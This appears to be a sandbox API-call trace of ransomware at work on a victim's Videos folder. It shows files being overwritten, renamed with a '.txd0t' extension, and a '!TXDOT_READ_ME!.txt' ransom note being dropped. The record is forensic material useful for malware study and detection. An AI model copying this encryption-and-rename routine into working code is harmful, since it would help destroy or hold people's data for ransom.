CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R\\vH3psvYnWA.swf" (normalized: "c:\\users\\fd1hvy\\videos\\ofxv0mmpkk_\\a w2nq\\0ll0qucyfiyhkhker r\\vh3psvynwa.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x47c [0076.853] GetFileSizeEx (in: hFile=0x47c, lpFileSize=0x37ffa28 | out: lpFileSize=0x37ffa28*=7503) returned 1 [0076.853] SetFilePointerEx (in: hFile=0x47c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.853] WriteFile (in: hFile=0x47c, lpBuffer=0x37ff70c*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x37ffa24, lpOverlapped=0x0 | out: lpBuffer=0x37ff70c*, lpNumberOfBytesWritten=0x37ffa24*=0x200, lpOverlapped=0x0) returned 1 [0076.854] SetFilePointerEx (in: hFile=0x47c, liDistanceToMove=0xffffe0b1, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.854] ReadFile (in: hFile=0x47c, lpBuffer=0x2ef0020, nNumberOfBytesToRead=0x1d40, lpNumberOfBytesRead=0x37ff400, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesRead=0x37ff400*=0x1d40, lpOverlapped=0x0) returned 1 [0076.854] SetFilePointerEx (in: hFile=0x47c, liDistanceToMove=0xffffe2c0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.854] WriteFile (in: hFile=0x47c, lpBuffer=0x2ef0020*, nNumberOfBytesToWrite=0x1d40, lpNumberOfBytesWritten=0x37ff404, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesWritten=0x37ff404*=0x1d40, lpOverlapped=0x0) returned 1 [0076.854] FlushFileBuffers (hFile=0x47c) returned 1 [0076.856] GetProcessHeap () returned 0xe30000 [0076.856] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x148) returned 0xed8e60 [0076.856] StrCpyW (in: psz1=0xed8e60, psz2="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R\\vH3psvYnWA.swf" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R\\vH3psvYnWA.swf") returned="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R\\vH3psvYnWA.swf" [0076.856] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R\\vH3psvYnWA.swf") returned="vH3psvYnWA.swf" [0076.856] StrCpyW (in: psz1=0xed8ee4, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0076.856] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R\\!TXDOT_READ_ME!.txt") returned 1 [0076.856] GetProcessHeap () returned 0xe30000 [0076.856] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed8e60 | out: hHeap=0xe30000) returned 1 [0076.856] CloseHandle (hObject=0x47c) returned 1 [0076.858] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R\\vH3psvYnWA.swf" (normalized: "c:\\users\\fd1hvy\\videos\\ofxv0mmpkk_\\a w2nq\\0ll0qucyfiyhkhker r\\vh3psvynwa.swf"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R\\vH3psvYnWA.swf.txd0t" (normalized: "c:\\users\\fd1hvy\\videos\\ofxv0mmpkk_\\a w2nq\\0ll0qucyfiyhkhker r\\vh3psvynwa.swf.txd0t")) returned 1 [0076.859] SetEvent (hEvent=0x3f8) returned 1 [0076.859] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x0 [0076.860] StrCpyW (in: psz1=0x37ff470, psz2="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0qq-2JELVv.avi" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0qq-2JELVv.avi") returned="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0qq-2JELVv.avi" [0076.860] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0qq-2JELVv.avi", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0qq-2JELVv.avi.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0qq-2JELVv.avi.txd0t" [0076.860] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0qq-2JELVv.avi.txd0t") returned 0 [0076.860] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0qq-2JELVv.avi", dwFileAttributes=0x80) returned 1 [0076.861] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0qq-2JELVv.avi" (normalized: "c:\\users\\fd1hvy\\videos\\ofxv0mmpkk_\\a w2nq\\0qq-2jelvv.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x460 [0076.861] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x37ffa28 | out: lpFileSize=0x37ffa28*=79085) returned 1 [0076.861] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.861] WriteFile (in: hFile=0x460, lpBuffer=0x37ff70c*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x37ffa24, lpOverlapped=0x0 | out: lpBuffer=0x37ff70c*, lpNumberOfBytesWritten=0x37ffa24*=0x200, lpOverlapped=0x0) returned 1 [0076.862] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xfffec913, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.862] ReadFile (in: hFile=0x460, lpBuffer=0x2ef0020, nNumberOfBytesToRead=0x134e0, lpNumberOfBytesRead=0x37ff430, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesRead=0x37ff430*=0x134e0, lpOverlapped=0x0) returned 1 [0076.863] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xfffecb20, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.863] WriteFile (in: hFile=0x460, lpBuffer=0x2ef0020*, nNumberOfBytesToWrite=0x134e0, lpNumberOfBytesWritten=0x37ff434, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesWritten=0x37ff434*=0x134e0, lpOverlapped=0x0) returned 1 [0076.864] FlushFileBuffers (hFile=0x460) returned 1 [0076.866] GetProcessHeap () returned 0xe30000 [0076.866] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x120) returned 0xe9b648 [0076.866] StrCpyW (in: psz1=0xe9b648, psz2="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0qq-2JELVv.avi" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0qq-2JELVv.avi") returned="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0qq-2JELVv.avi" [0076.866] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0qq-2JELVv.avi") returned="0qq-2JELVv.avi" [0076.866] StrCpyW (in: psz1=0xe9b6a4, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0076.866] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\!TXDOT_READ_ME!.txt") returned 0 [0076.866] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\!TXDOT_READ_ME!.txt" (normalized: "c:\\users\\fd1hvy\\videos\\ofxv0mmpkk_\\a w2nq\\!txdot_read_me!.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x47c [0076.866] WriteFile (in: hFile=0x47c, lpBuffer=0x37ff464*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x37ff460, lpOverlapped=0x0 | out: lpBuffer=0x37ff464*, lpNumberOfBytesWritten=0x37ff460*=0x2, lpOverlapped=0x0) returned 1 [0076.867] FlushFileBuffers (hFile=0x47c) returned 1 [0076.869] WriteFile (in: hFile=0x47c, lpBuffer=0x84d840*, nNumberOfBytesToWrite=0x7f0, lpNumberOfBytesWritten=0x37ff460, lpOverlapped=0x0 | out: lpBuffer=0x84d840*, lpNumberOfBytesWritten=0x37ff460*=0x7f0, lpOverlapped=0x0) returned 1 [0076.871] FlushFileBuffers (hFile=0x47c) returned 1 [0076.873] CloseHandle (hObject=0x47c) returned 1 [0076.873] GetProcessHeap () returned 0xe30000 [0076.873] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9b648 | out: hHeap=0xe30000) returned 1 [0076.873] CloseHandle (hObject=0x460) returned 1 [0076.876] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0qq-2JELVv.avi" (normalized: "c:\\users\\fd1hvy\\videos\\ofxv0mmpkk_\\a w2nq\\0qq-2jelvv.avi"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0qq-2JELVv.avi.txd0t" (normalized: "c:\\users\\fd1hvy\\videos\\ofxv0mmpkk_\\a w2nq\\0qq-2jelvv.avi.txd0t")) returned 1 [0076.877] SetEvent (hEvent=0x3f8) returned 1 [0076.877] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x0 [0076.927] StrCpyW (in: psz1=0x37ff470, psz2="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\fR4 C.mp4" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\fR4 C.mp4") returned="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\fR4 C.mp4" [0076.927] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\fR4 C.mp4", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\fR4 C.mp4.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\fR4 C.mp4.txd0t" [0076.927] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\fR4 C.mp4.txd0t") returned 0 [0076.927] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\fR4 C.mp4", dwFileAttributes=0x80) returned 1 [0076.928] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\fR4 C.mp4" (normalized: "c:\\users\\fd1hvy\\videos\\ofxv0mmpkk_\\a w2nq\\fr4 c.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x474 [0076.928] GetFileSizeEx (in: hFile=0x474, lpFileSize=0x37ffa28 | out: lpFileSize=0x37ffa28*=56308) returned 1 [0076.928] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.928] WriteFile (in: hFile=0x474, lpBuffer=0x37ff70c*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x37ffa24, lpOverlapped=0x0 | out: lpBuffer=0x37ff70c*, lpNumberOfBytesWritten=0x37ffa24*=0x200, lpOverlapped=0x0) returned 1 [0076.929] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xffff220c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.929] ReadFile (in: hFile=0x474, lpBuffer=0x2ef0020, nNumberOfBytesToRead=0xdbf0, lpNumberOfBytesRead=0x37ff430, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesRead=0x37ff430*=0xdbf0, lpOverlapped=0x0) returned 1 [0076.930] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xffff2410, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.930] WriteFile (in: hFile=0x474, lpBuffer=0x2ef0020*, nNumberOfBytesToWrite=0xdbf0, lpNumberOfBytesWritten=0x37ff434, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesWritten=0x37ff434*=0xdbf0, lpOverlapped=0x0) returned 1 [0076.930] FlushFileBuffers (hFile=0x474) returned 1 [0076.932] GetProcessHeap () returned 0xe30000 [0076.932] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x116) returned 0xed1b48 [0076.932] StrCpyW (in: psz1=0xed1b48, psz2="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\fR4 C.mp4" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\fR4 C.mp4") returned="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\fR4 C.mp4" [0076.932] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\fR4 C.mp4") returned="fR4 C.mp4" [0076.932] StrCpyW (in: psz1=0xed1ba4, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0076.932] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\!TXDOT_READ_ME!.txt") returned 1 [0076.932] GetProcessHeap () returned 0xe30000 [0076.932] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed1b48 | out: hHeap=0xe30000) returned 1 [0076.932] CloseHandle (hObject=0x474) returned 1 [0076.934] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\fR4 C.mp4" (normalized: "c:\\users\\fd1hvy\\videos\\ofxv0mmpkk_\\a w2nq\\fr4 c.mp4"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\fR4 C.mp4.txd0t" (normalized: "c:\\users\\fd1hvy\\videos\\ofxv0mmpkk_\\a w2nq\\fr4 c.mp4.txd0t")) returned 1 [0076.935] SetEvent (hEvent=0x3f8) returned 1 [0076.935] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x0 [0076.936] StrCpyW (in: psz1=0x37ff470, psz2="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\I8mA7.swf" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\I8mA7.swf") returned="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\I8mA7.swf" [0076.936] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\I8mA7.swf", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\I8mA7.swf.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\I8mA7.swf.txd0t" [0076.936] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\I8mA7.swf.txd0t") returned 0 [0076.936] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\I8mA7.swf", dwFileAttributes=0x80) returned 1 [0076.936] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\I8mA7.swf" (normalized: "c:\\users\\fd1hvy\\videos\\ofxv0mmpkk_\\a w2nq\\i8ma7.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x474 [0076.936] GetFileSizeEx (in: hFile=0x474, lpFileSize=0x37ffa28 | out: lpFileSize=0x37ffa28*=61983) returned 1 [0076.936] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.936] WriteFile (in: hFile=0x474, lpBuffer=0x37ff70c*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x37ffa24, lpOverlapped=0x0 | out: lpBuffer=0x37ff70c*, lpNumberOfBytesWritten=0x37ffa24*=0x200, lpOverlapped=0x0) returned 1 [0076.937] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xffff0be1, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.937] ReadFile (in: hFile=0x474, lpBuffer=0x2ef0020, nNumberOfBytesToRead=0xf210, lpNumberOfBytesRead=0x37ff430, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesRead=0x37ff430*=0xf210, lpOverlapped=0x0) returned 1 [0076.939] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xffff0df0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.939] WriteFile (in: hFile=0x474, lpBuffer=0x2ef0020*, nNumberOfBytesToWrite=0xf210, lpNumberOfBytesWritten=0x37ff434, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesWritten=0x37ff434*=0xf210, lpOverlapped=0x0) returned 1 [0076.939] FlushFileBuffers (hFile=0x474) returned 1 [0076.941] GetProcessHeap () returned 0xe30000 [0076.941] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x116) returned 0xed1b48 [0076.941] StrCpyW (in: psz1=0xed1b48, psz2="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\I8mA7.swf" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\I8mA7.swf") returned="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\I8mA7.swf" [0076.941] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\I8mA7.swf") returned="I8mA7.swf" [0076.941] StrCpyW (in: psz1=0xed1ba4, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0076.941] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\!TXDOT_READ_ME!.txt") returned 1 [0076.941] GetProcessHeap () returned 0xe30000 [0076.941] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed1b48 | out: hHeap=0xe30000) returned 1 [0076.941] CloseHandle (hObject=0x474) returned 1 [0076.943] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\I8mA7.swf" (normalized: "c:\\users\\fd1hvy\\videos\\ofxv0mmpkk_\\a w2nq\\i8ma7.swf"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\I8mA7.swf.txd0t" (normalized: "c:\\users\\fd1hvy\\videos\\ofxv0mmpkk_\\a w2nq\\i8ma7.swf.txd0t")) returned 1 [0076.944] SetEvent (hEvent=0x3f8) returned 1 [0076.944] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x0 [0076.945] StrCpyW (in: psz1=0x37ff470, psz2="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\iGBmnx.swf" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\iGBmnx.swf") returned="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\iGBmnx.swf" [0076.945] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\iGBmnx.swf", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\iGBmnx.swf.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\iGBmnx.swf.txd0t" [0076.945] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\iGBmnx.swf.txd0t") returned 0 [0076.945] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\iGBmnx.swf", dwFileAttributes=0x80) returned 1 [0076.945] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\iGBmnx.swf" (normalized: "c:\\users\\fd1hvy\\videos\\ofxv0mmpkk_\\a w2nq\\igbmnx.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x474 [0076.946] GetFileSizeEx (in: hFile=0x474, lpFileSize=0x37ffa28 | out: lpFileSize=0x37ffa28*=12680) returned 1 [0076.946] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.946] WriteFile (in: hFile=0x474, lpBuffer=0x37ff70c*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x37ffa24, lpOverlapped=0x0 | out: lpBuffer=0x37ff70c*, lpNumberOfBytesWritten=0x37ffa24*=0x200, lpOverlapped=0x0) returned 1 [0076.947] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xffffcc78, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.947] ReadFile (in: hFile=0x474, lpBuffer=0x2ef0020, nNumberOfBytesToRead=0x3180, lpNumberOfBytesRead=0x37ff430, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesRead=0x37ff430*=0x3180, lpOverlapped=0x0) returned 1 [0076.947] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xffffce80, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.947] WriteFile (in: hFile=0x474, lpBuffer=0x2ef0020*, nNumberOfBytesToWrite=0x3180, lpNumberOfBytesWritten=0x37ff434, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesWritten=0x37ff434*=0x3180, lpOverlapped=0x0) returned 1 [0076.947] FlushFileBuffers (hFile=0x474) returned 1 [0076.949] GetProcessHeap () returned 0xe30000 [0076.949] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x118) returned 0xed1330 [0076.949] StrCpyW (in: psz1=0xed1330, psz2="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\iGBmnx.swf" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\iGBmnx.swf") returned="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\iGBmnx.swf" [0076.949] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\iGBmnx.swf") returned="iGBmnx.swf" [0076.949] StrCpyW (in: psz1=0xed138c, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0076.949] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\!TXDOT_READ_ME!.txt") returned 1 [0076.949] GetProcessHeap () returned 0xe30000 [0076.949] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed1330 | out: hHeap=0xe30000) returned 1 [0076.949] CloseHandle (hObject=0x474) returned 1 [0076.952] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\iGBmnx.swf" (normalized: "c:\\users\\fd1hvy\\videos\\ofxv0mmpkk_\\a w2nq\\igbmnx.swf"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\iGBmnx.swf.txd0t" (normalized: "c:\\users\\fd1hvy\\videos\\ofxv0mmpkk_\\a w2nq\\igbmnx.swf.txd0t")) returned 1 [0076.953] SetEvent (hEvent=0x3f8) returned 1 [0076.953] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x0 [0076.954] StrCpyW (in: psz1=0x37ff460, psz2="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\IWWrfzZp12CtwW5GR.mkv" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\IWWrfzZp12CtwW5GR.mkv") returned="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\IWWrfzZp12CtwW5GR.mkv" [0076.954] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\IWWrfzZp12CtwW5GR.mkv", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\IWWrfzZp12CtwW5GR.mkv.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\IWWrfzZp12CtwW5GR.mkv.txd0t" [0076.954] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\IWWrfzZp12CtwW5GR.mkv.txd0t") returned 0 [0076.954] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\IWWrfzZp12CtwW5GR.mkv", dwFileAttributes=0x80) returned 1 [0076.955] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\IWWrfzZp12CtwW5GR.mkv" (normalized: "c:\\users\\fd1hvy\\videos\\ofxv0mmpkk_\\a w2nq\\iwwrfzzp12ctww5gr.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x474 [0076.955] GetFileSizeEx (in: hFile=0x474, lpFileSize=0x37ffa28 | out: lpFileSize=0x37ffa28*=48047) returned 1 [0076.955] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.955] 